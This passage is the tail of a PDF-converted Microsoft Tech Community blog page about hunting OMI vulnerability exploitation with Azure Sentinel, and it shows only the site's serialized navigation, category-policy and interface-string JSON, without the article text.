abuse","messageMarkedAsAbuse@board:IDEA":"This idea has been marked as
abuse","preModCommentAuthorText":"This comment will be published as soon as it is
approved","preModCommentModeratorText":"This comment is awaiting moderation","messageMarkedAsOther":"This post
has been rejected due to other reasons","messageMarkedAsOther@board:TKB":"This article has been rejected due to other
reasons","messageMarkedAsOther@board:BLOG":"This post has been rejected due to other
reasons","messageMarkedAsOther@board:FORUM":"This discussion has been rejected due to other
reasons","messageMarkedAsOther@board:OCCASION":"This event has been rejected due to other
reasons","messageMarkedAsOther@board:IDEA":"This idea has been rejected due to other
reasons","messageArchived":"This post was archived on {date}","relatedUrl":"View Related
Content","relatedContentText":"Showing related content","archivedContentLink":"View Archived
Content"},"localOverride":false},"Category:category:Exchange":
{"__typename":"Category","id":"category:Exchange","categoryPolicies":
{"__typename":"CategoryPolicies","canReadNode":
{"__typename":"PolicyResult","failureReason":null}}},"Category:category:Outlook":
{"__typename":"Category","id":"category:Outlook","categoryPolicies":{"__typename":"CategoryPolicies","canReadNode":
{"__typename":"PolicyResult","failureReason":null}}},"Category:category:Community-Info-Center":
{"__typename":"Category","id":"category:Community-Info-Center","categoryPolicies":
{"__typename":"CategoryPolicies","canReadNode":
{"__typename":"PolicyResult","failureReason":null}}},"Category:category:EducationSector":
{"__typename":"Category","id":"category:EducationSector","categoryPolicies":
{"__typename":"CategoryPolicies","canReadNode":
{"__typename":"PolicyResult","failureReason":null}}},"Category:category:DrivingAdoption":
{"__typename":"Category","id":"category:DrivingAdoption","categoryPolicies":
{"__typename":"CategoryPolicies","canReadNode":
{"__typename":"PolicyResult","failureReason":null}}},"Category:category:Azure":
{"__typename":"Category","id":"category:Azure","categoryPolicies":{"__typename":"CategoryPolicies","canReadNode":
{"__typename":"PolicyResult","failureReason":null}}},"Category:category:Windows-Server":
{"__typename":"Category","id":"category:Windows-Server","categoryPolicies":
{"__typename":"CategoryPolicies","canReadNode":
{"__typename":"PolicyResult","failureReason":null}}},"Category:category:MicrosoftTeams":
{"__typename":"Category","id":"category:MicrosoftTeams","categoryPolicies":
{"__typename":"CategoryPolicies","canReadNode":
{"__typename":"PolicyResult","failureReason":null}}},"Category:category:PublicSector":
{"__typename":"Category","id":"category:PublicSector","categoryPolicies":
{"__typename":"CategoryPolicies","canReadNode":
{"__typename":"PolicyResult","failureReason":null}}},"Category:category:microsoft365":
{"__typename":"Category","id":"category:microsoft365","categoryPolicies":
{"__typename":"CategoryPolicies","canReadNode":
{"__typename":"PolicyResult","failureReason":null}}},"Category:category:IoT":
{"__typename":"Category","id":"category:IoT","categoryPolicies":{"__typename":"CategoryPolicies","canReadNode":
{"__typename":"PolicyResult","failureReason":null}}},"Category:category:HealthcareAndLifeSciences":
{"__typename":"Category","id":"category:HealthcareAndLifeSciences","categoryPolicies":
{"__typename":"CategoryPolicies","canReadNode":
{"__typename":"PolicyResult","failureReason":null}}},"Category:category:ITOpsTalk":
{"__typename":"Category","id":"category:ITOpsTalk","categoryPolicies":
{"__typename":"CategoryPolicies","canReadNode":
{"__typename":"PolicyResult","failureReason":null}}},"Category:category:MicrosoftMechanics":
{"__typename":"Category","id":"category:MicrosoftMechanics","categoryPolicies":
{"__typename":"CategoryPolicies","canReadNode":
{"__typename":"PolicyResult","failureReason":null}}},"Category:category:MicrosoftforNonprofits":
{"__typename":"Category","id":"category:MicrosoftforNonprofits","categoryPolicies":
{"__typename":"CategoryPolicies","canReadNode":
{"__typename":"PolicyResult","failureReason":null}}},"Category:category:PartnerCommunity":
https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093
Page 34 of 38

{"__typename":"Category","id":"category:PartnerCommunity","categoryPolicies":
{"__typename":"CategoryPolicies","canReadNode":
{"__typename":"PolicyResult","failureReason":null}}},"Category:category:Microsoft365Copilot":
{"__typename":"Category","id":"category:Microsoft365Copilot","categoryPolicies":
{"__typename":"CategoryPolicies","canReadNode":
{"__typename":"PolicyResult","failureReason":null}}},"Category:category:Windows":
{"__typename":"Category","id":"category:Windows","categoryPolicies":
{"__typename":"CategoryPolicies","canReadNode":
{"__typename":"PolicyResult","failureReason":null}}},"Category:category:Content_Management":
{"__typename":"Category","id":"category:Content_Management","categoryPolicies":
{"__typename":"CategoryPolicies","canReadNode":
{"__typename":"PolicyResult","failureReason":null}}},"Category:category:CommunityNewsDesk":
{"__typename":"Category","id":"category:CommunityNewsDesk","categoryPolicies":
{"__typename":"CategoryPolicies","canReadNode":
{"__typename":"PolicyResult","failureReason":null}}},"Category:category:microsoft-learn-for-educators":
{"__typename":"Category","id":"category:microsoft-learn-for-educators","categoryPolicies":
{"__typename":"CategoryPolicies","canReadNode":
{"__typename":"PolicyResult","failureReason":null}}},"Category:category:mvp":
{"__typename":"Category","id":"category:mvp","categoryPolicies":{"__typename":"CategoryPolicies","canReadNode":
{"__typename":"PolicyResult","failureReason":null}}},"Category:category:microsoftintune":
{"__typename":"Category","id":"category:microsoftintune","categoryPolicies":
{"__typename":"CategoryPolicies","canReadNode":
{"__typename":"PolicyResult","failureReason":null}}},"Category:category:microsoft-global-community-initiative":
{"__typename":"Category","id":"category:microsoft-global-community-initiative","categoryPolicies":
{"__typename":"CategoryPolicies","canReadNode":
{"__typename":"PolicyResult","failureReason":null}}},"Category:category:usergroups":
{"__typename":"Category","id":"category:usergroups","categoryPolicies":
{"__typename":"CategoryPolicies","canReadNode":
{"__typename":"PolicyResult","failureReason":null}}},"Category:category:skills-hub":
{"__typename":"Category","id":"category:skills-hub","categoryPolicies":
{"__typename":"CategoryPolicies","canReadNode":
{"__typename":"PolicyResult","failureReason":null}}},"Blog:board:skills-hub-blog":
{"__typename":"Blog","id":"board:skills-hub-blog","blogPolicies":{"__typename":"BlogPolicies","canReadNode":
{"__typename":"PolicyResult","failureReason":null}},"boardPolicies":{"__typename":"BoardPolicies","canReadNode":
{"__typename":"PolicyResult","failureReason":null}}},"CachedAsset:text:en_US-components/community/Navbar-1775111751222":{"__typename":"CachedAsset","id":"text:en_US-components/community/Navbar-1775111751222","value":{"community":"Community Home","inbox":"Inbox","manageContent":"Manage
Content","tos":"Terms of Service","forgotPassword":"Forgot Password","themeEditor":"Theme Editor","edit":"Edit
Navigation Bar","skipContent":"Skip to content","gxcuf89792":"Tech Community","windows-server":"Windows
Server","ms-learn-ext-security":"Microsoft Security","Common_Enntvz-i-t-ops-talk-link":"ITOps Talk","education-sector":"Education Sector","Common-external-link-9":"Microsoft 365","Common-external-link-8":"Dynamics
365","Common-external-link-7":"Skilling Room Directory","Common-external-link-6":"Events","Common-external-link-5":"Blogs","Common-external-link-4":"View All","Common-gxcuf89792-community":"Community","Common-external-link-3":"Topics","microsoft365":"Microsoft 365","Common_Enntvz-community-news-desk-link":"Community News
Desk","Common_Enntvz-azure-link":"Azure","Common-community-info-center-link":"Lounge","azure":"Azure","Common_Enntvz-windows-link":"Windows","Common_Enntvz-education-sector-link":"Education Sector","Common-windows-server-link":"Windows Server","products-link":"Products","Common_Enntvz-partner-community-link":"Microsoft Partner Community","microsoft-learn-blog":"Blog","Common-external-link-2":"View All","community-hub-link":"Community Hubs","Common-mvp-link":"Microsoft MVP Program","community-info-center":"Lounge","microsoft-endpoint-manager":"Microsoft
Intune","startupsat-microsoft":"Startups at Microsoft","ms-learn-ext-azure":"Azure","Common_Enntvz-content_management-link":"Content Management","ms-learn-ext-github":"Github","Common-microsoft365-
link":"Microsoft 365","Common-i-t-ops-talk-link":"ITOps Talk","Common_Enntvz-view-all-products-link":"View
All","Common-microsoft-global-community-initiative-link":"Microsoft Global Community Initiative (MGCI)","all-events-link":"Events","Common_Enntvz-microsoft-learn-for-educators-link":"Microsoft Learn for Educators","Common-external-link":"Community Hubs","Common-partner-community-link":"Microsoft Partner Community","Common-microsoft-learn-for-educators-link":"Microsoft Learn for Educators","Common_Enntvz-microsoft-teams-link":"Microsoft Teams","driving-adoption":"Driving Adoption","microsoft-learn":"Microsoft Learn","Common-healthcare-and-life-sciences-link":"Healthcare and Life Sciences","planner":"Outlook","Common_Enntvz-exchange-link":"Exchange","healthcare-and-life-sciences":"Healthcare and Life Sciences","Common-external-link-10":"View All","Common-driving-adoption-link":"Driving Adoption","ms-learn-ext-pp":"Power Platform","Common_Enntvz-windows-server-link":"Windows
Server","Common-io-t-link":"Internet of Things (IoT)","Skills-Hub":"Skills Hub","microsoft-teams":"Microsoft
Teams","Common-outlook-link":"Outlook","Common_Enntvz-public-sector-link":"Public Sector","Common-windows-link":"Windows","all-blogs-link":"Blogs","communities":"Products","Common_Enntvz-usergroups-link":"User
https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093
Page 35 of 38

Groups","Common_Enntvz-microsoft-global-community-initiative-link":"Microsoft Global Community Initiative
(MGCI)","Skills-Hub-link":"Community","Common_Enntvz-io-t-link":"Internet of Things (IoT)","ms-learn-ext-m365":"Microsoft 365","Common_Enntvz-microsoft-mechanics-link":"Microsoft Mechanics","microsoft-learn-community":"Community","partner-community":"Microsoft Partner Community","Common-microsoft-mechanics-link":"Microsoft Mechanics","Common_Enntvz-healthcare-and-life-sciences-link":"Healthcare and Life
Sciences","microsoft-mechanics":"Microsoft Mechanics","Common-microsoft-security-link":"Microsoft
Security","Common-education-sector-link":"Education Sector","Skills-Hub-Blog":"Blog","i-t-ops-talk":"ITOps
Talk","microsoft-securityand-compliance":"Microsoft Security","Common_Enntvz-microsoftintune-link":"Microsoft
Intune","Common-azure-link":"Azure","Common-microsoftintune-link":"Microsoft Intune","Common_Enntvz-view-all-topics-link":"View All","Common-usergroups-link":"User Groups","Common-public-sector-link":"Public
Sector","Common_Enntvz-microsoft-security-link":"Microsoft Security","Common_Enntvz-outlook-link":"Outlook","Common_Enntvz-mvp-link":"Microsoft MVP Program","exchange":"Exchange","topics-link":"Topics","io-t":"Internet of Things (IoT)","Common-microsoft365-copilot-link":"Microsoft 365 Copilot","Common-microsoft-teams-link":"Microsoft Teams","s-m-b":"Nonprofit Community","Common_Enntvz-community-info-center-link":"Lounge","Common_Enntvz-microsoft365-copilot-link":"Microsoft 365 Copilot","Common_Enntvz-microsoftfor-nonprofits-link":"Nonprofit Community","Common_Enntvz-microsoft365-link":"Microsoft 365","Common-content_management-link":"Content Management","ms-learn-ext-teams":"Teams","s-q-l-server":"Content
Management","products-services":"Products","Common-community-news-desk-link":"Community News Desk","ms-learn-ext-LD":"Skilling Room Directory","Common-exchange-link":"Exchange","Common-gxcuf89792-link":"Tech
Community","windows":"Windows","public-sector":"Public Sector","Common_Enntvz-driving-adoption-link":"Driving
Adoption","Common-microsoftfor-nonprofits-link":"Nonprofit Community","ms-learn-ext-net":".NET","ms-learn-ext-dynamics":"Dynamics 365","a-i":"AI and Machine Learning","outlook":"Microsoft 365
Copilot"},"localOverride":false},"CachedAsset:text:en_US-components/community/NavbarHamburgerDropdown-1775111751222":{"__typename":"CachedAsset","id":"text:en_US-components/community/NavbarHamburgerDropdown-1775111751222","value":{"hamburgerLabelOpen":"Open Side Menu","hamburgerLabelClose":"Close Side
Menu"},"localOverride":false},"CachedAsset:text:en_US-components/community/BrandLogo-1775111751222":
{"__typename":"CachedAsset","id":"text:en_US-components/community/BrandLogo-1775111751222","value":
{"logoAlt":"Khoros","themeLogoAlt":"Brand Logo","linkAriaLabel":"Go to community home
page"},"localOverride":false},"CachedAsset:text:en_US-components/community/NavbarTextLinks-1775111751222":
{"__typename":"CachedAsset","id":"text:en_US-components/community/NavbarTextLinks-1775111751222","value":
{"more":"More"},"localOverride":false},"CachedAsset:text:en_US-components/search/SpotlightSearchIcon-1775111751222":{"__typename":"CachedAsset","id":"text:en_US-components/search/SpotlightSearchIcon-1775111751222","value":{"search":"Search"},"localOverride":false},"CachedAsset:text:en_US-components/authentication/AuthenticationLink-1775111751222":{"__typename":"CachedAsset","id":"text:en_US-components/authentication/AuthenticationLink-1775111751222","value":{"title.login":"Sign
In","title.registration":"Register","title.forgotPassword":"Forgot Password","title.multiAuthLogin":"Sign
In"},"localOverride":false},"CachedAsset:text:en_US-components/nodes/NodeLink-1775111751222":
{"__typename":"CachedAsset","id":"text:en_US-components/nodes/NodeLink-1775111751222","value":{"place":"Go back
to {name}"},"localOverride":false},"CachedAsset:text:en_US-components/messages/MessageView/MessageViewStandard-1775111751222":{"__typename":"CachedAsset","id":"text:en_US-components/messages/MessageView/MessageViewStandard-1775111751222","value":
{"anonymous":"Anonymous","author":"{messageAuthorLogin}","authorBy":"{messageAuthorLogin}","board":"
{messageBoardTitle}","replyToUser":" to {parentAuthor}","showMoreReplies":"Show
More","replyText":"Reply","repliesText":"Replies","markedAsSolved":"Marked as Solution","messageStatus":"Status:
","statusChanged":"Status changed: {previousStatus} to {currentStatus}","statusAdded":"Status added:
{status}","statusRemoved":"Status removed: {status}","labelExpand":"expand replies","labelCollapse":"collapse
replies","unhelpfulReason.reason1":"Content is outdated","unhelpfulReason.reason2":"Article is missing
information","unhelpfulReason.reason3":"Content is for a different Product","unhelpfulReason.reason4":"Doesn't match
what I was searching for"},"localOverride":false},"CachedAsset:text:en_US-components/messages/MessageReplyCallToAction-1775111751222":{"__typename":"CachedAsset","id":"text:en_US-components/messages/MessageReplyCallToAction-1775111751222","value":{"leaveReply":"Leave a
reply...","leaveReply@board:BLOG@message:root":"Leave a
comment...","leaveReply@board:TKB@message:root":"Leave a
comment...","leaveReply@board:IDEA@message:root":"Leave a
comment...","leaveReply@board:OCCASION@message:root":"Leave a comment...","repliesTurnedOff.FORUM":"Replies
are turned off for this topic","repliesTurnedOff.BLOG":"Comments are turned off for this
topic","repliesTurnedOff.TKB":"Comments are turned off for this topic","repliesTurnedOff.IDEA":"Comments are turned
off for this topic","repliesTurnedOff.OCCASION":"Comments are turned off for this topic","infoText":"Stop poking
me!"},"localOverride":false},"CachedAsset:text:en_US-components/community/NavbarDropdownToggle-1775111751222":{"__typename":"CachedAsset","id":"text:en_US-components/community/NavbarDropdownToggle-1775111751222","value":{"ariaLabelClosed":"Press the down arrow to open the
menu"},"localOverride":false},"CachedAsset:text:en_US-components/messages/MessageCoverImage-1775111751222":
{"__typename":"CachedAsset","id":"text:en_US-components/messages/MessageCoverImage-1775111751222","value":
{"coverImageTitle":"Cover Image"},"localOverride":false},"CachedAsset:text:en_US-https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093
Page 36 of 38

shared/client/components/nodes/NodeTitle-1775111751222":{"__typename":"CachedAsset","id":"text:en_US-shared/client/components/nodes/NodeTitle-1775111751222","value":{"nodeTitle":"{nodeTitle, select, community
{Community} other {{nodeTitle}}} "},"localOverride":false},"CachedAsset:text:en_US-components/messages/MessageTimeToRead-1775111751222":{"__typename":"CachedAsset","id":"text:en_US-components/messages/MessageTimeToRead-1775111751222","value":{"minReadText":"{min} MIN
READ"},"localOverride":false},"CachedAsset:text:en_US-components/messages/MessageSubject-1775111751222":
{"__typename":"CachedAsset","id":"text:en_US-components/messages/MessageSubject-1775111751222","value":
{"noSubject":"(no subject)"},"localOverride":false},"CachedAsset:text:en_US-components/users/UserLink-1775111751222":{"__typename":"CachedAsset","id":"text:en_US-components/users/UserLink-1775111751222","value":
{"authorName":"View Profile: {author}","anonymous":"Anonymous","ariaLabel.rank":"Rank:
{rankName}"},"localOverride":false},"CachedAsset:text:en_US-shared/client/components/users/UserRank-1775111751222":{"__typename":"CachedAsset","id":"text:en_US-shared/client/components/users/UserRank-1775111751222","value":{"rankName":"{rankName}","userRank":"Author rank
{rankName}"},"localOverride":false},"CachedAsset:text:en_US-components/messages/MessageTime-1775111751222":
{"__typename":"CachedAsset","id":"text:en_US-components/messages/MessageTime-1775111751222","value":
{"postTime":"Published: {time}","lastPublishTime":"Last Update: {time}","conversation.lastPostingActivityTime":"Last
posting activity time: {time}","conversation.lastPostTime":"Last post time: {time}","moderationData.rejectTime":"Rejected
time: {time}"},"localOverride":false},"CachedAsset:text:en_US-components/messages/MessageBody-1775111751222":
{"__typename":"CachedAsset","id":"text:en_US-components/messages/MessageBody-1775111751222","value":
{"showMessageBody":"Show More","mentionsErrorTitle":"{mentionsType, select, board {Board} user {User} message
{Message} other {}} No Longer Available","mentionsErrorMessage":"The {mentionsType} you are trying to view has been
removed from the community.","videoProcessing":"Video is being processed. Please try again in a few
minutes.","bannerTitle":"Video provider requires cookies to play the video. Accept to continue or {url} it directly on the
provider's site.","buttonTitle":"Accept","urlText":"watch"},"localOverride":false},"CachedAsset:text:en_US-components/messages/MessageCustomFields-1775111751222":{"__typename":"CachedAsset","id":"text:en_US-components/messages/MessageCustomFields-1775111751222","value":{"CustomField.default.label":"Value of
{name}"},"localOverride":false},"CachedAsset:text:en_US-components/messages/MessageRevision-1775111751222":
{"__typename":"CachedAsset","id":"text:en_US-components/messages/MessageRevision-1775111751222","value":
{"lastUpdatedDatePublished":"{publishCount, plural, one{Published} other{Updated}}
{date}","lastUpdatedDateDraft":"Created {date}","version":"Version {major}.
{minor}"},"localOverride":false},"CachedAsset:text:en_US-shared/client/components/common/QueryHandler-1775111751222":{"__typename":"CachedAsset","id":"text:en_US-shared/client/components/common/QueryHandler-1775111751222","value":{"title":"Query Handler"},"localOverride":false},"CachedAsset:text:en_US-components/tags/TagList-1775111751222":{"__typename":"CachedAsset","id":"text:en_US-components/tags/TagList-1775111751222","value":{"showMoreFor":"Show more for {title}"},"localOverride":false},"CachedAsset:text:en_US-components/messages/MessageReplyButton-1775111751222":{"__typename":"CachedAsset","id":"text:en_US-components/messages/MessageReplyButton-1775111751222","value":{"repliesCount":"
{count}","title":"Reply","title@board:BLOG@message:root":"Comment","title@board:TKB@message:root":"Comment","title@board:IDEA@message:
components/messages/MessageAuthorBio-1775111751222":{"__typename":"CachedAsset","id":"text:en_US-components/messages/MessageAuthorBio-1775111751222","value":{"sendMessage":"Send
Message","actionMessage":"Follow this blog board to get notified when there's new activity","coAuthor":"CO-PUBLISHER","contributor":"CONTRIBUTOR","userProfile":"View Profile","iconlink":"Go to {name}
{type}"},"localOverride":false},"CachedAsset:text:en_US-shared/client/components/users/UserAvatar-1775111751222":
{"__typename":"CachedAsset","id":"text:en_US-shared/client/components/users/UserAvatar-1775111751222","value":
{"altText":"{login}'s avatar","altTextGeneric":"User's avatar"},"localOverride":false},"CachedAsset:text:en_US-shared/client/components/ranks/UserRankLabel-1775111751222":{"__typename":"CachedAsset","id":"text:en_US-shared/client/components/ranks/UserRankLabel-1775111751222","value":{"altTitle":"Icon for {rankName}
rank"},"localOverride":false},"CachedAsset:text:en_US-components/tags/TagView/TagViewChip-1775111751222":
{"__typename":"CachedAsset","id":"text:en_US-components/tags/TagView/TagViewChip-1775111751222","value":
{"tagLabelName":"Tag name {tagName}"},"localOverride":false},"CachedAsset:text:en_US-components/users/UserRegistrationDate-1775111751222":{"__typename":"CachedAsset","id":"text:en_US-components/users/UserRegistrationDate-1775111751222","value":{"noPrefix":"{date}","withPrefix":"Joined
{date}"},"localOverride":false},"CachedAsset:text:en_US-shared/client/components/nodes/NodeAvatar-1775111751222":
{"__typename":"CachedAsset","id":"text:en_US-shared/client/components/nodes/NodeAvatar-1775111751222","value":
{"altTitle":"Node avatar for {nodeTitle}"},"localOverride":false},"CachedAsset:text:en_US-shared/client/components/nodes/NodeDescription-1775111751222":{"__typename":"CachedAsset","id":"text:en_US-shared/client/components/nodes/NodeDescription-1775111751222","value":{"description":"
{description}"},"localOverride":false},"CachedAsset:text:en_US-shared/client/components/nodes/NodeIcon-1775111751222":{"__typename":"CachedAsset","id":"text:en_US-shared/client/components/nodes/NodeIcon-1775111751222","value":{"contentType":"Content Type {style, select, FORUM {Forum} BLOG {Blog} TKB {Knowledge
Base} IDEA {Ideas} OCCASION {Events} other {}}
icon"},"localOverride":false}}}},"page":"/blogs/BlogMessagePage/BlogMessagePage","query":
{"boardId":"microsoftsentinelblog","messageSubject":"hunting-for-omi-vulnerability-exploitation-with-azure-sentinel","messageId":"2764093"},"buildId":"VXuOn2D5MfObWEiRanLQ9","runtimeConfig":
https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093
Page 37 of 38

{"buildInformationVisible":false,"logLevelApp":"info","logLevelMetrics":"info","surveysEnabled":true,"openTelemetry":
{"clientEnabled":false,"configName":"o365","serviceVersion":"26.1.0","universe":"prod","collector":"http://localhost:4318","logLevel":"error","routeCha
["components_community_Navbar_NavbarWidget","components_community_Breadcrumb_BreadcrumbWidget","components_customComponent_Custo
[{"id":"analytics","src":"https://techcommunity.microsoft.com/t5/s/gxcuf89792/pagescripts/1751476272000/analytics.js?
page.id=BlogMessagePage&entity.id=board%3Amicrosoftsentinelblog&entity.id=message%3A2764093","strategy":"afterInteractive"}]}
Source: https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093
https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093
Page 38 of 38